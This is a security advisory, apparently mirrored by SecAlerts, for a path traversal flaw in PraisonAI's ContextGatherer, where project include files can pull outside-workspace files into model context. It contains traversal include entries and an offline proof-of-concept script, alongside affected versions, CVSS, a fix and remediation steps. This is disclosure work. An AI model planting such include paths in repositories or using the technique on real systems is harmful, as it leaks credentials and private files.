GHSA-q7m5-3jmv-vm48: Path Traversal

Published Oct 8, 2026
·
Updated

ContextGatherer include resolution permits absolute and traversal reads outside the workspace

Summary

PraisonAI's praisonai.ui.context.ContextGatherer treats the configured directory as the project workspace, but project-controlled .praisoncontext and .praisoninclude files can name absolute paths or .. traversal paths. When context gathering runs, PraisonAI opens those outside paths and appends their contents to the generated context bundle. An attacker who can supply or modify a workspace repository can therefore cause process-readable files outside the intended project root to be sent to the caller or model as project context.

Technical Details

ContextGatherer.getincludepaths() reads include entries directly from .praisoncontext and .praisoninclude under the configured workspace. It stores each non-comment line as a raw include path:

python includefile = os.path.join(self.directory, '.praisoncontext') if os.path.exists(includefile): with open(includefile, 'r') as f: includepaths.extend( line.strip() for line in f if line.strip() and not line.startswith('#') )

When .praisoncontext is present, gathercontext() passes every include entry through os.path.join(self.directory, includepath) and then processes the result:

python for includepath in self.includepaths: fullpath = os.path.join(self.directory, includepath) processpath(fullpath)

The .praisoninclude path has the same unsafe join after first processing the workspace:

python processpath(self.directory) for includepath in self.includepaths: fullpath = os.path.join(self.directory, includepath) processpath(fullpath)

There is no canonicalization or containment check before processpath() opens files or recursively walks directories. In Python, os.path.join(workspace, absolutepath) returns the absolute path and discards workspace; os.path.join(workspace, "../outside.py") remains outside the workspace once normalized by filesystem operations. addfilecontent() then opens the supplied path and appends file contents to the context before display bookkeeping:

python with open(filepath, 'r', encoding='utf-8') as f: content = f.read() context.append( f"File: {filepath}\n\n{content}\n\n{'=' 50}\n" ) self.includedfiles.append( Path(filepath).relativeto(self.directory) )

For parent traversal paths, Path(filepath).relativeto(self.directory) raises after the outside file content has already been appended, so the caller receives the outside content even if an error is logged. For absolute paths, the outside content is appended as well. This violates the workspace invariant for a context-gathering feature: repository-local include metadata should select files within the project, not arbitrary process-readable host files.

PoV

The minimal vulnerable shape is a workspace containing only a normal source file and one include file:

text workspace/ .praisoncontext # contains: ../outsidesecret.py inside.py outsidesecret.py # outside the workspace

Running ContextGatherer(directory="workspace").run() returns context containing outsidesecret.py even though that file is outside the configured workspace. The same result occurs when .praisoncontext contains an absolute path to the outside file, and when .praisoninclude contains either the parent traversal path or the absolute path.

PoC

Save the self-contained script from the Appendix below as contextincludeworkspacepov.py, then run it against a local checkout:

bash export PRAISONAI=/path/to/PraisonAI PYTHONPATH="$PRAISONAI/src/praisonai" python contextincludeworkspacepov.py

Expected vulnerable output:

json { "expectations": { "controlinsidefileiscollected": true, "controlwithoutincludedoesnotreadoutside": true, "praisoncontextabsolutepathdisclosesoutside": true, "praisoncontextparenttraversaldisclosesoutside": true, "praisonincludeabsolutepathdisclosesoutside": true, "praisonincludeparenttraversaldisclosesoutside": true }, "sourcecommit": "1620b49f36945d8cc8ee5635b906c960df5097a0", "sourcefile": "$PRAISONAI/src/praisonai/praisonai/ui/context.py", "vulnerable": true }

The version sweep sampled old and current releases. All sampled versions are vulnerable:

text {"ref":"v2.3.10","praisonaiversion":"2.3.10","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v2.3.11","praisonaiversion":"2.3.11","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v3.8.1","praisonaiversion":"3.8.1","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v3.9.26","praisonaiversion":"3.9.26","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v4.4.12","praisonaiversion":"4.4.12","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v4.5.16","praisonaiversion":"4.5.16","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v4.5.128","praisonaiversion":"4.5.128","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v4.6.58","praisonaiversion":"4.6.58","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v4.6.62","praisonaiversion":"4.6.62","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"v4.6.63","praisonaiversion":"4.6.63","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true} {"ref":"HEAD","praisonaiversion":"4.6.63","status":"vulnerable","controlwithoutincludedoesnotreadoutside":true,"relativepraisoncontextdisclosesoutside":true,"absolutepraisoncontextdisclosesoutside":true,"relativepraisonincludedisclosesoutside":true,"absolutepraisonincludedisclosesoutside":true}

No external service, live target, real credential, model provider, or network access is needed for reproduction.

Impact

If a user or service runs PraisonAI context gathering on an attacker-influenced workspace, the attacker can cause local files outside the project root to be included in the generated context. Practical impacts include disclosure of source files from adjacent projects, local configuration, prompt transcripts, logs, API keys, and other process-readable text files with extensions that ContextGatherer considers relevant. If the context bundle is sent to an external model or exposed to a lower-trust caller, the file contents leave the intended workspace boundary.

This report claims confidentiality impact only. It does not claim arbitrary write, command execution, or availability impact.

Suggested severity: Medium under the direct local/workspace threat model because user interaction is required to run context gathering on an attacker-influenced workspace. Deployments that automatically gather context for untrusted repositories and forward it to a third-party model may score higher.

Suggested CVSS 3.1 vector:

text CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Relevant CWEs:

- CWE-22: Improper Limitation of a Pathname to a Restricted Directory - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

Suggested Fix

Make include-file path resolution fail closed around a single workspace-containment helper:

1. Resolve the configured workspace root once with Path(self.directory).resolve(). 2. For each include entry, reject absolute paths outside the workspace. 3. Join relative include entries to the workspace, resolve the result, and require resolved.relativeto(workspaceroot) to succeed before opening or walking anything. 4. Apply the helper to both .praisoncontext and .praisoninclude processing. 5. Reject escaped directories as well as escaped files; processpath() can recursively walk directories. 6. Avoid appending file content before display/bookkeeping operations that can fail. 7. Add regression tests for ../outside.py, absolute outside paths, and outside directories in both .praisoncontext and .praisoninclude.

Minimal containment shape:

python def resolveworkspaceinclude(workspace: str, includepath: str) -> Path: root = Path(workspace).resolve() candidate = Path(includepath) if not candidate.isabsolute(): candidate = root / candidate resolved = candidate.resolve() try: resolved.relativeto(root) except ValueError as exc: raise PermissionError(f"Context include path is outside workspace: {includepath}") from exc return resolved

Affected Package/Versions

- Package: PraisonAI / praisonai - Component: praisonai.ui.context.ContextGatherer - Current main tested: 1620b49f36945d8cc8ee5635b906c960df5097a0 - Current package version in the tested source tree: 4.6.63 - Latest tested release tag: v4.6.63 - Oldest sampled vulnerable release tag: v2.3.10

Suggested affected range, based on the sampled source sweep:

text praisonai >= 2.3.10, <= 4.6.63

The exact first affected released package version should be confirmed from release history; the sampled range shows the bug is longstanding and still present on current main.

Advisory History

No checked public advisory or local prior report matched praisonai.ui.context.ContextGatherer reading outside-workspace files because project-controlled .praisoncontext or .praisoninclude entries contain absolute paths or .. traversal paths.

Closest public comparators are related but distinct:

- GHSA-gcq3-mfvh-3x25: PraisonAI Code agent tools fail open without a workspace boundary. That advisory covers praisonai Code CODETOOLS wrappers and unset workspace defaults for read/edit helpers. This report has an explicitly configured workspace directory and an attacker-controlled include file inside that workspace; it does not use Code tools or an unset global workspace. - GHSA-j7qx-p75m-wp7g: PraisonAI dynamic-context artifact tools read arbitrary host files outside artifact storage. That advisory covers Dynamic Context artifact tools that accept raw artifactpath values. This report covers praisonai.ui.context.ContextGatherer include-file processing. - GHSA-22cj-m4wf-fv2c: PraisonAI Dynamic Context history and terminal tools read files outside configured storage via path traversal. That advisory covers Dynamic Context history/terminal stores where runid and agentid are path components. This report covers .praisoncontext/.praisoninclude entries in the classic UI context gatherer. - GHSA-grrg-5cg9-58pf / CVE-2026-40117: readskillfile() arbitrary file read. This report does not use skill tools or approval-gated skill file APIs. - GHSA-7j2f-xc8p-fjmq / CVE-2026-40152 and GHSA-693f-pf34-72c5: FileTools/listing path traversal surfaces. This report is not in praisonaiagents.tools.filetools or legacy FileTools; it discloses file content through context-gathering output. - GHSA-fwh2-95jw-g4j6: PraisonAI MultiAgentMonitor path traversal, published on 2026-06-19, affects versions before 1.5.115. This report affects current main and 4.6.63 and is triggered by .praisoncontext/.praisoninclude include paths rather than MultiAgentMonitor path parameters. - GHSA-qwwv-hc99-6f5p, GHSA-5fr5-2c3f-3fcr, GHSA-gx4r-3wg8-9w5x, and GHSA-x44p-gg67-52fc: current public PraisonAI advisories for MultiAgentLedger duplicate IDs, AGUI CORS/authorization, UI approval-mode command execution, and approval cache keying. None covers ContextGatherer, .praisoncontext, .praisoninclude, or praisonai.ui.context.

Public search found no hits for PraisonAI ContextGatherer .praisoncontext workspace boundary arbitrary file read, praisoninclude ContextGatherer, or praisonai.ui.context in public GitHub advisory text.

References

- PraisonAI repository: https://github.com/MervinPraison/PraisonAI - PraisonAI security advisories: https://github.com/MervinPraison/PraisonAI/security/advisories - GitHub Advisory Database search for PraisonAI: https://github.com/advisories?query=PraisonAI - GHSA-gcq3-mfvh-3x25: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-gcq3-mfvh-3x25 - GHSA-j7qx-p75m-wp7g: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-j7qx-p75m-wp7g - GHSA-22cj-m4wf-fv2c: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-22cj-m4wf-fv2c - GHSA-grrg-5cg9-58pf: https://github.com/advisories/GHSA-grrg-5cg9-58pf - GHSA-7j2f-xc8p-fjmq: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-7j2f-xc8p-fjmq - GHSA-fwh2-95jw-g4j6: https://github.com/advisories/GHSA-fwh2-95jw-g4j6 - CWE-22: https://cwe.mitre.org/data/definitions/22.html - CWE-200: https://cwe.mitre.org/data/definitions/200.html

Appendix: Self-Contained Context Include Workspace PoC

python #!/usr/bin/env python3 """Offline PoV for PraisonAI ContextGatherer include-file workspace escape."""

from future import annotations

import contextlib import io import inspect import json import logging import subprocess import tempfile from pathlib import Path

from praisonai.ui.context import ContextGatherer

CANARY = "PRAISONCONTEXTCANARY=outside-workspace" logging.getLogger("praisonai.ui.context").disabled = True

def importedsourcefile() -> Path: return Path(inspect.getfile(ContextGatherer)).resolve()

def githead(sourcefile: Path) -> str: try: reporoot = next(parent for parent in sourcefile.parents if (parent / ".git").exists()) return subprocess.checkoutput( ["git", "-C", str(reporoot), "rev-parse", "HEAD"], text=True, stderr=subprocess.DEVNULL, ).strip() except Exception: return "unknown"

def gathercontext(workspace: Path) -> tuple[str, str]: stdout = io.StringIO() stderr = io.StringIO() with contextlib.redirectstdout(stdout), contextlib.redirectstderr(stderr): context, tokens, tree = ContextGatherer( directory=str(workspace), maxfilesize=100000, maxtokens=100000, ).run() return context, stdout.getvalue() + stderr.getvalue()

def resetincludefiles(workspace: Path) -> None: for name in (".praisoncontext", ".praisoninclude"): path = workspace / name if path.exists(): path.unlink()

def redact(value, temproot: Path, sourcefile: Path): if isinstance(value, str): sourceroot = next((parent for parent in sourcefile.parents if (parent / ".git").exists()), sourcefile.parents[4]) return value.replace(str(temproot), "$TMPDIR").replace(str(sourceroot), "$PRAISONAI") if isinstance(value, list): return [redact(item, temproot, sourcefile) for item in value] if isinstance(value, dict): return {key: redact(item, temproot, sourcefile) for key, item in value.items()} return value

def main() -> None: sourcefile = importedsourcefile() with tempfile.TemporaryDirectory(prefix="praison-context-include-pov-") as tmp: temproot = Path(tmp) workspace = temproot / "workspace" workspace.mkdir() inside = workspace / "inside.py" outside = temproot / "outsidesecret.py" inside.writetext("INSIDEONLY = True\n", encoding="utf-8") outside.writetext(f"{CANARY}\n", encoding="utf-8")

contexts = {} logs = {}

resetincludefiles(workspace) contexts["controlnoinclude"], logs["controlnoinclude"] = gathercontext(workspace)

resetincludefiles(workspace) (workspace / ".praisoncontext").writetext("../outsidesecret.py\n", encoding="utf-8") contexts["praisoncontextparenttraversal"], logs["praisoncontextparenttraversal"] = gathercontext(workspace)

resetincludefiles(workspace) (workspace / ".praisoncontext").writetext(str(outside) + "\n", encoding="utf-8") contexts["praisoncontextabsolutepath"], logs["praisoncontextabsolutepath"] = gathercontext(workspace)

resetincludefiles(workspace) (workspace / ".praisoninclude").writetext("../outsidesecret.py\n", encoding="utf-8") contexts["praisonincludeparenttraversal"], logs["praisonincludeparenttraversal"] = gathercontext(workspace)

resetincludefiles(workspace) (workspace / ".praisoninclude").writetext(str(outside) + "\n", encoding="utf-8") contexts["praisonincludeabsolutepath"], logs["praisonincludeabsolutepath"] = gathercontext(workspace)

expectations = { "controlwithoutincludedoesnotreadoutside": CANARY not in contexts["controlnoinclude"], "controlinsidefileiscollected": "INSIDEONLY = True" in contexts["controlnoinclude"], "praisoncontextparenttraversaldisclosesoutside": CANARY in contexts["praisoncontextparenttraversal"], "praisoncontextabsolutepathdisclosesoutside": CANARY in contexts["praisoncontextabsolutepath"], "praisonincludeparenttraversaldisclosesoutside": CANARY in contexts["praisonincludeparenttraversal"], "praisonincludeabsolutepathdisclosesoutside": CANARY in contexts["praisonincludeabsolutepath"], }

output = { "sourcecommit": githead(sourcefile), "sourcefile": str(sourcefile), "workspaceroot": str(workspace), "outsidefile": str(outside), "vulnerable": all(expectations.values()), "expectations": expectations, "contextcontains": { name: { "containsinside": "INSIDEONLY = True" in context, "containsoutsidecanary": CANARY in context, } for name, context in contexts.items() }, "capturedlogs": logs, }

print(json.dumps(redact(output, temproot, sourcefile), indent=2, sortkeys=True))

if name == "main": main()

Affected Software

1 affected componentFixes available
pip/praisonai<=4.6.77
4.6.78

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade pip/praisonai to a version that resolves this vulnerability.

    Fixed in 4.6.78
  2. Compensating control

    In praisonai.ui.context.ContextGatherer, resolve the configured workspace root once with Path(self.directory).resolve(), then apply a fail-closed containment helper to both .praisoncontext and .praisoninclude entries: resolve each candidate path and require resolved.relative_to(workspace_root) to succeed before opening or recursively walking it, rejecting absolute paths, parent-traversal paths, and escaped directories. Ensure file content is not appended until validation and display/bookkeeping operations have succeeded, and add regression tests covering ../outside.py, absolute outside paths, and outside directories for both include files.

Event History

Oct 8, 2026
Advisory Published
via GitHub·05:58 PM
Data Sourced
via GitHub·05:58 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

Who is exposed to this issue?

Deployments that run ContextGatherer on a workspace repository that an attacker can supply or modify are exposed. The impact is limited to files outside the workspace that are readable by the process running PraisonAI.

2

What must an attacker control to exploit it?

The attacker needs to supply or modify a workspace repository and add include entries to .praisoncontext or .praisoninclude. Those entries can use absolute paths or .. traversal paths to reference files outside the configured directory.

3

How can I check whether a workspace is affected?

Inspect .praisoncontext and .praisoninclude in the configured workspace for non-comment include entries containing absolute paths or .. path components. If context gathering has processed such entries, the referenced process-readable file contents may have been appended to the generated context bundle.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203